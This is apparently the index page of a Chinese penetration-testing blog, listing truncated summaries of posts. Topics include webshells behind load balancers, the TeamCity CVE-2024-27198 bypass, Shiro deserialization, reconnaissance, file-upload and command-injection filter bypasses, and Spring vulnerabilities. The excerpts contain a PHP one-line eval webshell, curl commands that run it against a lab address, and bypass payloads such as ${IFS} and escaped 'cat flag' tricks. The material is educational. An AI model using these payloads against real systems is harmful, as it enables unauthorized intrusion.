事在人为

摘要 负载均衡下的webshell连接本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！ 前言之前面试的时候有个面试官问我，如果webshell连接之后不稳定怎么办（有时候会断掉，或是文件上传后大小不匹配），我当时回答是可能存在负载均衡，面试官继续问我如何解决这个问题，当时对这一块了解确实不是很多，后期特意学习了一下。 负载均衡的概念及分类不是我们本文的讲解重点，大家可以参考下面的链接了解一下。 https://blog.csdn.net/wanghangzhen/article/details/118554304 ‍ 我们重点讨论不能直接访问到跑着具体业务的某个节点的情况，比如说「反向代理方式」。 反向代理方式其中比较流行的方式是用 nginx 来做负载均衡。我们先简单的介绍一下 nginx 支持的几种策略： 名称 策略 轮询（默认） 按请求顺序逐 ...

摘要 Teamcity 认证绕过致代码执行漏洞(CVE-2024-27198)1 漏洞简介JetBrains TeamCity是一款由JetBrains开发的持续集成和持续交付(CI/CD)服务器。它提供了一个功能强大的平台，用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程，提高开发团队的效率和产品质量。 JetBrains TeamCity在2023.11.4版本之前存在认证绕过漏洞，允许执行管理员操作。攻击者可以精心设计一个 URL，以避免所有身份验证检查，从而允许未经身份验证的攻击者直接访问需要身份验证的端点。未经身份验证的远程攻击者可以利用此漏洞完全控制易受攻击的 TeamCity 服务器。 2 影响范围Teamcity < 2023.11.4 3 环境搭建3.1 导入docker image1$ docker load -i teamcity.tar 3.2启动环境1$ docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity:we ...

摘要 Shiro漏洞分析及利用1.Shiro概述Shiro是一个用Java编写的强大且易于使用的身份验证、授权和加密框架。它提供了一套完整的安全解决方案，可以轻松地集成到Java应用程序中。Shiro的设计目标是简化应用程序的安全性实现，同时保持灵活性和可扩展性。 Apache Shiro 是一个开源安全框架，提供身份验证、授权、密码学和会话管理。在它编号为 550 的 issue 中爆出严重的 Java 反序列化漏洞。 在 Apache Shiro<=1.2.4 版本中 AES 加密时采用的 key 是硬编码在代码中的，这就为伪造 cookie 提供了机会。 只要 rememberMe 的 AES 加密密钥泄露，无论 shiro 是什么版本都会导致反序列化漏洞，重点是找到反序列化链子。 Shiro 的 “记住我” 功能是设置 cookie 中的 rememberMe 值来实现。当后端接收到来自未经身份验证的用户的请求时，它将通过执行以下操作来寻找他们记住的身份： 检索 cookie 中 RememberMe 的值； Base64 解码； 使用 AES 解密； 反 ...

摘要 cemu环境搭建简易方法：1.pip3 install cemu 2.python -m cemu 可视化启动 若启动失败，报错AttributeError: module ‘cemu’ has no attribute ‘context’，这是官方bug，不是你的原因。 解答：https://github.com/hugsy/cemu/issues/87 具体方法： pip install -U https://github.com/hugsy/cemu/archive/refs/heads/main.zip python -m cemu cli终端启动 稳妥方法： pip install virtualenvwrapper-win -i https://pypi.tuna.tsinghua.edu.cn/simple pip install lief pip install keystone pip install capstone pip install unicorn pip install -U cemu 会报错 原因是安装cemu时会安装PyQt5， ...

摘要 信息收集信息资产收集是渗透测试的关键、也是渗透测试的成功保障 （知⼰知彼，百战百胜） 1.企业信息收集之域名信息收集1.通过域名找到公司1).ICP备案什么是ICP备案 《⾮经营性互联⽹信息服务备案管理办法》于2005年3⽉20⽇起施⾏。 办法指出在中华⼈⺠共和国境内提供⾮经营性互联⽹信息服务，应当依法履⾏备案⼿续。 2).ICP备案查询：https://icp.chinaz.com/​ 3).WhoisWhois 是⽤来查询域名的IP以及所有者等信息的传输协议。简单说，whois就是⼀个⽤来查询域名是否 已经被注册，以及注册域名的详细信息的数据库（如域名所有⼈、域名注册商）。 由于境外的⽹站不需要icp备案，⽆法通过备案信息进⾏查询，故⽽可以使⽤whois查询 https://www.ggcx.com/main/whois ​ 4).证书指纹每个https协议的⽹站都具备SSL证书，证书中可能会包含申请组织，也就是公司的名字 例如 steam 游戏平台官⽹ ​ 2.通过公司找域名通过域名找到公司很简单，其实在很多⽹站上都是⼀⽬了然，⽆需过多了解。 通过公司找到⽹站，就 ...

摘要 小常识1.$$可变变量$$a​ 是 PHP 中的一种特殊变量引用语法，被称为”可变变量”（variable variables）。它允许您使用一个变量的值作为另一个变量的名称。 让我们详细解释 $$a​ 的含义： $a​ 是一个普通的变量，其中存储了一个字符串值，通常用于表示变量的名称。 $$a​ 使用 $a​ 的值作为变量名称，并尝试访问这个变量。 例如，如果 $a​ 的值为 “myVar”，那么 $$a​ 将尝试访问名为 $myVar​ 的变量。 下面是一个示例： 1234$a = "myVar";$myVar = "Hello, world!";echo $$a; // 输出 "Hello, world!" 在这个示例中，$a​ 包含字符串 “myVar”，然后 $$a​ 将根据 $a​ 的值尝试访问 $myVar​，并将 “Hello, world!” 打印出来。 需要注意的是，使用可变变量时要格外小心，因为它们可能会导致代码的可读性变差，并且在不慎使用时可能引发错误或安全问题。通常情况下，最好使用数 ...

摘要 文件上传一句话木马 <?php @eval($_POST['hacker']); ?>​ ‍ curl -d “hacker=echo get_current_user(); “ http://192.168.149.136:88/images/shell.php ​ ‍ curl -d “hacker=echo getcwd();” http://192.168.149.136:88/images/shell.php ​ ‍ ​ 后缀名绕过 黑名单 ​ ‍ ​ ​ ​ php30被解析为文本文件。 ​ ​ ​ 或者 ​ Burpsuite抓取到的数据包，将Content-Type的类型改为允许上传的类型—> image/jpeg，然后再方放行数据包（forward），显示shell1.php文件上传成功。 .htaccess绕过概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自 ...

摘要 同源策略及跨站访问​ ‍ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ‍

摘要 命令执行绕过1.空格绕过1234567891011121314151617%09${IFS}<IFS9 {IFS} $IFS $IFS$1 //$1改成$加其他数字貌似都行 IFS < <> {cat,flag.php} //用逗号实现了空格功能，需要用{}括起来 %20 (space) %09 (tab) X\='cat\\x09./flag.php';$X （\\x09表示tab，也可以用\\x20） ‍ 2.system函数绕过passthru ‍ 3.cat绕过12345678910sortodlessmore使用tac反向输出命令： linux命令中可以加\，所以甚至可以ca\t /fl\ag ‍ 4.无字母数字绕过正则表达式总结（含上传临时文件、异或、或、取反、自增脚本）123456789<?phperror_reporting(0);highlight_file(__FILE__);$code=$_G ...

摘要 框架安全​ ​ ​ 1.Spring框架漏洞​ ​ ​ 12curl -X POST -H "Content-Type:application/json-patch+json" -d '{"firstname":"si","lastname":"Li"}' http://127.0.0.1:8080/customers ​ ​ 123curl -X DELETE -H "Content-Type:application/json-patch+json" -d '{"firstname":"si","lastname":"Li"}' http://127.0.0.1:8080/customers/2 ​ ​ ​ ​ ​ 修改后： poc 1234[{ " ...